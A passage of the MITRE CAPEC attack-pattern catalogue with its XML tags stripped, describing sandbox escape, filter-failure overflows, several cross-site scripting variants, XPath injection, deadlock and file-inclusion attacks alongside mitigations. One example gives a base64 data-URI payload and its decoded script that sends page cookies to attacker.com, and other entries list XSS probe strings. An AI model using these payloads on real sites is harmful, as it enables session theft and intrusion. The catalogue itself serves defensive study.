weaknesses in the standard libraries. Sanitize the code of the standard libraries to make sure there are no security weaknesses in them. Exploit the security weaknesses in the standard libraries The attacker calls signed malicious code from another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. The attacker calls signed malicious code from another language to exploit the security weaknesses in the standard libraries. env-All The attacker escapes the sandbox to obtain access to privileges that were not intentionally exposed by the sandbox. Sanitize the code of the standard libraries to make sure there is no security weaknesses in them. A framework-based language that supports code signing and sandbox (such as Java, .Net, JavaScript, and Flash) Deployed code that has been signed by its authoring vendor, or a partner Very High Low Analysis API Abuse Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Exploit:Java/ByteVerify.C attempts to download a file named "msits.exe", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003. High The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail. No special resource is required. Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them. Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries. Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library. Configuration: Get latest updates for the computer. Access_Control Authorization Bypass protection mechanism Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity 693 Targeted 1000 Attack Pattern ChildOf 68 http://capec.mitre.org/data/definitions/68.html 1000 Attack Pattern ChildOf 115 Exploitation High High High All All All Java ASP.NET C# JSP Other J. Cappos J. Rasley J. Samuel I. Beschastnikh C. Barsan A. Krishnamurthy T. Anderson Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code The 17th ACM Conference on Computer and Communications Security (CCS '10) 2010 Malware Protection Center: Threat Research and Response Exploit: Java/ByteVerify.C Microsoft Corporation 2007 http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Exploit%3AJava%2FByteVerify.C Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content 1000 Attack Pattern ChildOf 68 1000 Attack Pattern ChildOf 56 In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. lets the user input into the system unfiltered). Survey The attacker surveys the target application, possibly as a valid and authenticated user Spidering web sites for inputs that involve potential filtering env-Web Brute force guessing of filtered inputs env-All Software messages (e.g., "the following characters are not allowed...") indicate that filtered inputs are present in the software. ( env-Web env-ClientServer Application uses predefined inputs (e.g., drop-down lists, radio buttons, selection lists, etc.) env-Web env-ClientServer env-Local env-Embedded Managed code (e.g., .NET, Java) is likely, based on URLs. env-Web Managed code (e.g., .NET, Java) is likely, based on files found in software. env-ClientServer env-Local env-Embedded env-Peer2Peer env-CommProtocol Java code is likely, based on standard disclaimers (e.g., "This software contains Java from Sun...."). Such declarations are frequent on commercial software that is based on Java. env-Embedded env-Local env-ClientServer Java code is likely, based on one of the other indicators, but it could contain Java Native Interface (JNI) code. This is indicated by the inclusion of DLLs or equivalent binary object code with Java code. env-Embedded env-Local env-ClientServer Attempt injections Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose. Brute force attack through black box penetration test tool. env-Web env-ClientServer env-CommProtocol env-Peer2Peer Fuzzing of communications protocols env-CommProtocol env-Peer2Peer env-ClientServer Manual testing of possible inputs with attack data. env-All Unexpected output from the application. No unexpected output from the application. Monitor and analyze logs for failures that exceed common usage sizes. For example, if typical transactions, even normal failed transactions, rarely exceed 250 characters, monitor logs for all attempts that contain 250 or more characters. In the event of successful exploitation, there may actually be no useful log. But an attacker's experiments will likely show up, giving clues to the ultimate attack. Disconnect or block connections from systems or users that exceed acceptable heuristics for normal transaction sizes. Monitor responses Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in? Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data. env-All Check Log files. An attacker with access to log files can look at the outcome of bad input. env-Local env-Embedded Prevent access to log files that contain error output. Prevent access to and/or sanitize all error output. Abuse the system through filter failure An attacker writes a script to consistently induce the filter failure. DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly. env-All Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system. env-All An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists. env-All Failure mode of the software (perhaps as a safety mechanism) includes exiting or ceasing to respond. env-All Failures do not involve stopping services, rejecting inputs or connections, and do not affect other simultaneous users of the software. env-All Attacker-supplied code is executed on the target system. The software stops responding for at least two orders of magnitude longer than the input takes to send. (e.g., 0.1s to send input induces at least a 10 second period non-responsiveness). Non-response by an attacker's input has an impact on the quality of service of other simultaneous users of the software. Monitor software response time regularly, and react to unexpected variations. Execute filtering modules with minimal privileges. Execute filtering modules in operating system "sandboxes" or similar containers. Ability to control the length of data passed to an active filter. High High Injection Attack Example: Filter Failure in Taylor UUCP Daemon Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack. A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection. Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack. Low An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS. High Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level. Try to feed very long data as input to the program and watch for any indication that a failure has occurred. Then see if input has been admitted into the system. Some dynamic analysis tools may be helpful here to determine whether failure can be induced by feeding overly long inputs strings into the system. Many exceptions are thrown by the application's filter modules in a short period of time. Check the logs. See if the probes are coming from the same IP address. An attacker may temporally space out their probes. An attacker may perform probes from different IP addresses. Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs. Pre-design: Use a language or compiler that performs automatic bounds checking. Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution. Operational: Use OS-level preventative functionality. Not a complete solution. Design: Use an abstraction library to abstract away risky APIs. Not a complete solution. Integrity Modify memory Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Bypass protection mechanism Availability DoS: crash / exit / restart Web form, URL, File, Command line, Network socket, etc. All of the data that just got into the system unfiltered becomes the payload. Since the input enters the system effectively unfiltered, it may be dangerous if used in a SQL statement (i.e. SQL injection), as part of the command executed on the target system (i.e. command injection), as part of the reflection API (i.e. reflection injection), placed in logs (i.e. log injection), or perhaps to overflow another buffer in the system and give the attacker ability to execute arbitrary code. A subsequent buffer overflow may not even be required for that as the original one may be leveraged if the attacker gets lucky, that is the payload is activated in the filter itself, which also becomes the activation zone. Since no input validation is effectively performed in this situation, the impact of the attack may be a complete compromise of confidentiality, integrity, accountability and availability services. 120 Targeted 119 Targeted 118 Targeted 74 Targeted 20 Targeted 680 Targeted 733 Secondary 697 Targeted 1000 Attack Pattern CanFollow 100 1000 Attack Pattern ChildOf 100 Input validation and filtering logic should fail securely (vault doors are closed) Failing Securely All input should be treated as rejected by default, unless explicitly allowed by the filter. Thus if the filter fails before "blessing" the data, it will be rejected. Penetration Medium High Medium All All All All C C++ G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-119: Buffer Errors Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/119.html [R.24.1][REF-2] Cigital, Inc 2007-03-01 [R.24.1][REF-2] Cigital, Inc 2007-03-01 Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow 1000 Category ChildOf 152 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns 1000 Attack Pattern ChildOf 240 1000 Category ChildOf 152 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns The attacker inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities. The target application must fail to adequately sanitize HTML attributes against the presence of dangerous commands. Medium The attacker must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed. Design: Use libraries and templates that minimize unfiltered input. Implementation: Normalize, filter and white list all input including that which is not expected to have any scripting content. Implementation: The victim should configure the browser to minimize active content from untrusted sources. 79 Targeted 83 Targeted 1000 Attack Pattern ChildOf 18 Jeremiah Grossman Attribute-Based Cross-Site Scripting http://jeremiahgrossman.blogspot.com/2007/07/attribute-based-cross-site-scripting.html An attack of this type exploits the ability of most browsers to interpret "data", "javascript" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link. Survey the application Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds. Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery. env-Web URL parameters are used by the application or the browser (DOM) in a context that is originally used for storing URL (anchor's "href", script's "src", etc.) env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web Attempt injection payload variations on input parameters Possibly using an automated tool, an attacker requests variations on the inputs he surveyed before. He sends parameters that include variations of payloads. He records all the responses from the server that include unmodified versions of his script. Use a list of XSS probe strings using different URI schemes to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier to trace the injected string back to the entry point. env-Web Use a proxy tool to record results of manual input of XSS probes in known URLs. env-Web Input parameters are printed back in a URL placeholder that support different URI schemes such as HREF, SRC, and other attributes env-Web Nothing is returned to the web page. The payload may be a stored to be served later. The unique identifier from the probe helps to trace the flow of the possible XSS env-Web The attacker's cross-site scripting string is included in the URI scheme content and can be triggered by a user (a victim in this case). Custom URI scheme aren't allowed by the application Some sensitive characters are consistently encoded, but others are not Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input of scripting syntax Do not embed user-controllable input generated HTTP headers Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Steal session IDs, credentials, page content, etc. As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker. env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately. env-Web The attacker gets the user's cookies or other session identifiers. The attacker gets the content of the page the user is viewing. The attacker causes the user's browser to visit a page with malicious content. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Forceful browsing When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not). Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities). env-Web The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF. The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Content spoofing By manipulating the content, the attacker targets the information that the user would like to get from the website Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page. env-Web The user sees a page containing wrong information Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Target client software must allow scripting such as JavaScript and allows executable content delivered using a data URI scheme. High High Injection Protocol Manipulation The following payload data: text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg== represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser. The decoded payload is the following piece of HTML code: <html> <body> <script> var img = new Image(); img.src = "http://attacker.com/cookiegrabber?"+ encodeURIComponent(document.cookies); </script> </body> </html> Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack. An attacker could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute): <a href="INJECTION_POINT">My Link</a> Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack. Medium To inject the malicious payload in a web page Ability to send HTTP request to a web application Design: Use browser technologies that do not allow client side scripting. Design: Utilize strict type, character, and encoding enforcement. Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering. Implementation: Perform input validation for all remote content, including remote and user-generated content Implementation: Perform output validation for all remote content. Implementation: Disable scripting languages such as JavaScript in browser Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this. Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism Any HTTP Request transport variables (GET, POST, Headers, etc.) XSS malicious script leveraging URI schemes Client web browser where script is executed Client web browser may be used to steal session data, passwords, cookies, and other tokens. 79 Targeted 84 Targeted 85 Targeted 20 Targeted 86 Targeted 692 Targeted 697 Targeted 713 Targeted 71 Targeted 1000 Attack Pattern ChildOf 18 http://capec.mitre.org/data/definitions/18.html 1000 Attack Pattern ChildOf 220 http://capec.mitre.org/data/definitions/220.html Exploitation High High Low Client-Server n-Tier All All All OWASP Testing Guide Testing for Cross site scripting v2 The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Testing_for_Cross_site_scripting Google Cross-Site Scripting HOWTO article Google http://code.google.com/p/doctype/wiki/ArticleXSSInUrlAttributes OWASP Cheatsheets XSS Filter Evasion Cheat Sheet The Open Web Application Security Project (OWASP) http://ha.ckers.org/xss.html WASC Threat Classification 2.0 WASC-08 - Cross Site Scripting The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Cross-Site+Scripting Romain Gaucher Cigital, Inc. Review - 0.2 MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Romain Gaucher Cigital, Inc. Review - 0.2 CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases The attacker bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<<script or %3C%3script using URI encoding) the filters of some web applications may fail to recognize the presence of a script tag. If the targeted server is vulnerable to this type of bypass, the attacker can create a crafted URL or other trap to cause a victim to view a page on the targeted server where the malicious content is executed, as per a normal XSS attack. The targeted web application does not fully normalize input before checking for prohibited syntax. In particular, it must fail to recognize prohibited methods preceded by certain sequences of repeated characters. Medium The attacker must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed. Design: Use libraries and templates that minimize unfiltered input. Implementation: Normalize, filter and sanitize all user supplied fields. Implementation: The victim should configure the browser to minimize active content from untrusted sources. 79 Targeted 85 Targeted CVE-2008-2070 The WHM interface 11.15.0 for cPanel 11.18 before 11.18.4 and 11.22 before 11.22.3 allows remote attackers to bypass XSS protection and inject arbitrary script or HTML via repeated, improperly-ordered "<" and ">" characters in the (1) issue parameter to scripts2/knowlegebase, (2) user parameter to scripts2/changeip, (3) search parameter to scripts2/listaccts, and other unspecified vectors. 1000 Attack Pattern ChildOf 18 Matteo Carli XSS and CSRF vulnerability on Cpanel Symantec Connect SecurityFocus May 9, 2008 http://www.securityfocus.com/archive/1/archive/1/491864/100/0/threaded An attacker injects malicious script to global parameters in a Flash movie via a crafted URL. The malicious script is executed in the context of the Flash movie. As such, this is a form of Cross-Site Scripting (XSS), but the abilities granted to the Flash movie make this attack more flexible. Spider Using a browser or an automated tool, an attacker records all instances of Flash movies and verifies that known variables allow for simple XSS. Use search engines to locate SWF files (Flash movie files) that can be accessed via a URL containing known variable parameters. env-Web Use a search engine to locate SWF files on a specific file server. env-Web A SWF Flash movie file that is accessed via a URL using a global or known variable has been located, or a potential SWF file on a specific target server has been located. env-Web A SWF Flash movie file has not been located. env-Web A list of SWF files with the potential for XSS. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Determine the SWF file susceptibility to XSS Determine the SWF file susceptibility to XSS. For each SWF file identified in the Explore phase, the attacker attempts to use various techniques such as reverse engineering and various XSS attacks to determine the vulnerability of the file. Compile a list of all variables, both global and specific to the file, that might invoke the getURL function. env-Web Test each variable by overwriting the variable amount via the URL, by adding "javascript:" followed by a simple JavaScript command such as "alert('xss')". env-Web At least one variable is found susceptible to flash cross-site scripting. No variable is found susceptible to flash cross-site scripting. User input must be sanitized according to context before reflected back to the user. 79 Targeted 1000 Attack Pattern ChildOf 18 1000 Attack Pattern ChildOf 182 MITRE Content Team MITRE 2013-06-21 Updated Attack_Step_Description, Attack_Step_Technique_Description, Attack_Step_Title, Environments, Indicator_Description, Outcome_Description, Security_Control_Description, and Summary The attacker inserts invalid characters in identifiers to bypass application filtering of input. Filters may not scan beyond invalid characters but during later stages of processing content that follows these invalid characters may still be processed. This allows the attacker to sneak prohibited commands past filters and perform normally prohibited operations. Invalid characters may include null, carriage return, line feed or tab in an identifier. Successful bypassing of the filter can result in a XSS attack, resulting in the disclosure of web cookies or possibly other results. The target must fail to remove invalid characters from input and fail to adequately scan beyond these characters. Medium No special resources are required. Design: Use libraries and templates that minimize unfiltered input. Implementation: Normalize, filter and white list any input that will be included in any subsequent web pages or back end operations. Implementation: The victim should configure the browser to minimize active content from untrusted sources. 79 Targeted 86 Targeted 1000 Attack Pattern ChildOf 18 1000 Category ChildOf 152 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns 1000 Category ChildOf 152 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns This attack attempts to trigger and exploit a deadlock condition in the target software to cause a denial of service. A deadlock can occur when two or more competing actions are waiting for each other to finish, and thus neither ever does. Deadlock condition are not easy to detect. The attacker initiates an exploratory phase to get familiar with the system. The attacker triggers a first action (such as holding a resource) and initiates a second action which will wait for the first one to finish. If the target program has a deadlock condition, the program waits indefinitely resulting in a denial of service. The target host has a deadlock condition. There are four conditions for a deadlock to occur, known as the Coffman conditions. [R.25.3][REF-6] The target host exposes an API to the user. High Low Analysis API Abuse An example of a deadlock which may occur in database products is the following. Client applications using the database may require exclusive access to a table, and in order to gain exclusive access they ask for a lock. If one client application holds a lock on a table and attempts to obtain the lock on a second table that is already held by a second client application, this may lead to deadlock if the second application then attempts to obtain the lock that is held by the first application (Source: Wikipedia, http://en.wikipedia.org/wiki/Deadlock) Medium This type of attack may be sophisticated and require knowledge about the system's resources and APIs. The attacker can probe by trying to hold resources and call APIs which are directly using the same resources. The attacker may try to find actions (threads, processes) competing for the same resources. Use known algorithm to avoid deadlock condition (for instance non-blocking synchronization algorithms). For competing actions use well-known libraries which implement synchronization. Availability DoS: resource consumption (other) Denial of Service 412 Secondary 567 Secondary 662 Targeted 1000 Category ChildOf 172 Exploitation Low Low High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-412 - Unrestricted Critical Resource Lock Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/412.html Wikipedia Deadlock The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Deadlock Eric Dalci Cigital, Inc 2007-01-25 Eric Dalci Cigital, Inc 2007-01-25 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Likelihood and other general areas Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Attack_Prerequisite Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Likelihood and other general areas Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, References, Solutions_and_Mitigations An attacker utilizes crafted XML user-controllable input probe, attack, and inject data into the XML database, using techniques similar to SQL injection. The user-controllable input can allow for unauthorized viewing of data, bypassing authentication or the front-end application for direct XML database access, and possibly altering database information. Survey Application Spider web sites for all available links. env-Web Gather results for analysis via responses or network sniffing. env-ClientServer env-Peer2Peer env-CommProtocol At least one data input to application identified. No inputs to application identified, although this does not mean the application will not accept any. Test user-controllable inputs for injection Use XML reserved characters or words, possibly with other input data to attempt to cause unexpected results env-Web Attacker receives normal response from server. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Attacker receives an error message from server indicating that there was a problem with the SQL query. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException) env-Web env-ClientServer env-Peer2Peer env-CommProtocol At least one user-controllable input susceptible to injection found. No user-controllable input susceptible to injection found. XML queries used to process user input and retrieve information stored in XML documents User-controllable input not properly sanitized High Injection Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass. Low An attacker must have knowledge of XML syntax and constructs in order to successfully leverage XML Injection None The attacker tries to inject characters that can cause an error, such as single-quote (') or equal sign (=), or content that may cause a malformed XML expression. If the injection of such content into the input causes an XPath error and the resulting error is displayed unfiltered, the attacker can begin to determine the nature of input validation and structure of XPath expressions used in queries. Too many exceptions generated by the application as a result of malformed queries Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XML data or a query. Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application. Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Read application data User-controllable input used as part of XML queries XML expressions intended to reveal information or bypass authentication XML database The impact of payload activation is that it is interpreted as part of the XPath expression used in the query, thus enabling an attacker to modify the expression used by the query. 91 Targeted 74 Secondary 20 Secondary 390 Secondary 713 Targeted 707 Targeted 1000 Category ChildOf 152 333 Category HasMember 356 Special characters in user-controllable input must be escaped before use by the application. Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database. Reluctance to Trust Failing Securely Defense in Depth Never Use Input as Part of a Directive to any Internal Component Handle All Errors Safely Penetration Exploitation High High Medium Client-Server SOA All All All Common Weakness Enumeration (CWE) CWE-91 - XML Injection Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/91.html Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html Common Weakness Enumeration (CWE) CWE-390 - Improper Error Handling Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/390.html CAPEC Content Team MITRE 2013-12-18 Updated Activation_Zone, Architectural_Paradigms, Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Description, Description Summary, Examples-Instances, Frameworks, Indicators-Warnings_of_Attack, Injection_Vector, Languages, Methods_of_Attack, Payload, Payload_Activation_Impact, Platforms, Probing_Techniques, Purposes, References, Related_Attack_Patterns, Related_Guidelines, Related_Security_Principles, Related_Weaknesses, Relevant_Security_Requirements, Resources_Required, Solutions_and_Mitigations, Technical_Context, Type (Attack_Pattern -> Attack_Pattern), Typical_Likelihood_of_Exploit CAPEC Content Team MITRE 2014-02-06 Updated Description Summary, Indicators-Warnings_of_Attack The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways. The targeted application must have a bug that allows an attacker to control which code file is loaded at some juncture. Some variants of this attack may require that old versions of some code files be present and in predictable locations. Medium The attacker needs to have enough access to the target application to control the identity of a locally included file. The attacker may also need to be able to upload arbitrary code files to the target machine, although any location for these files may be acceptable. CVE-2009-0932 Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. 1000 Attack Pattern ChildOf 175 The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways. The targeted PHP application must have a bug that allows an attacker to control which code file is loaded at some juncture. Medium The attacker needs to have enough access to the target application to control the identity of a locally included PHP file. CVE-2009-0932 Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. 1000 Attack Pattern ChildOf 190 1000 Category ChildOf 152 1000 Attack Pattern ChildOf 279 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker sends a SOAP request with an array whose actual length exceeds the length indicated in the request. When a data structure including a SOAP array is instantiated, the sender transmits the size of the array as an explicit parameter along with the data. If the server processing the transmission naively trusts the specified size, then an attacker can intentionally understate the size of the array, possibly resulting in a buffer overflow if the server attempts to read the entire data set into the memory it allocated for a smaller array. This, in turn, can 